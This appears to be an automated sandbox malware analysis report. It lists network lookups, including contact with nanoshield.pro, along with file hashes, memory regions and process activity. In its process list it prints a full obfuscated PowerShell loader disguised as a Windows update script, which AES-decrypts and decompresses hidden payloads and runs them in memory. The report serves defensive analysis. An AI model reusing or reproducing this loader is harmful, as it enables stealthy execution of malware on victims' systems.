| US | 8.8.8.8:53 | 19.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 172.67.203.108:443 | nanoshield.pro | tcp |
| US | 8.8.8.8:53 | 108.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dcx5rz30.v4i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4140-9-0x00000151F7600000-0x00000151F7622000-memory.dmp
memory/4140-10-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/4140-11-0x00000151DCF40000-0x00000151DCF50000-memory.dmp
memory/4140-12-0x00000151DCF40000-0x00000151DCF50000-memory.dmp
memory/3304-13-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/3304-23-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp
memory/3304-24-0x000002C5CD840000-0x000002C5CD88E000-memory.dmp
memory/4136-26-0x000001F8A1DF0000-0x000001F8A1E00000-memory.dmp
memory/4136-25-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/4136-42-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
memory/3304-43-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7c0e589f91d9ceee1b937d2bb3381dab |
| SHA1 | 1fcdf3e9a0888cf23edb5fa6b2e89ff99b9a6a93 |
| SHA256 | b6d1df24d29cf8b985fccb7bb79bcead5bd6cc068b3bc2c8701230baa59b034a |
| SHA512 | 65b299281626acfe988b11903072bda49f72003d4186b8e6b6971b1bca4a261e749b91588e139898a26eceb01a56d2a72a5fd2c8f5b78e71a9d54f9359cbe310 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/3304-47-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50a8221b93fbd2628ac460dd408a9fc1 |
| SHA1 | 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6 |
| SHA256 | 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e |
| SHA512 | 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0 |
memory/4140-50-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240319-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2868-4-0x000000001B160000-0x000000001B442000-memory.dmp
memory/2868-5-0x0000000002420000-0x0000000002428000-memory.dmp
memory/2868-6-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp
memory/2868-7-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-8-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-9-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-11-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-10-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp
memory/2868-12-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp
memory/2868-13-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-14-0x00000000025F0000-0x0000000002670000-memory.dmp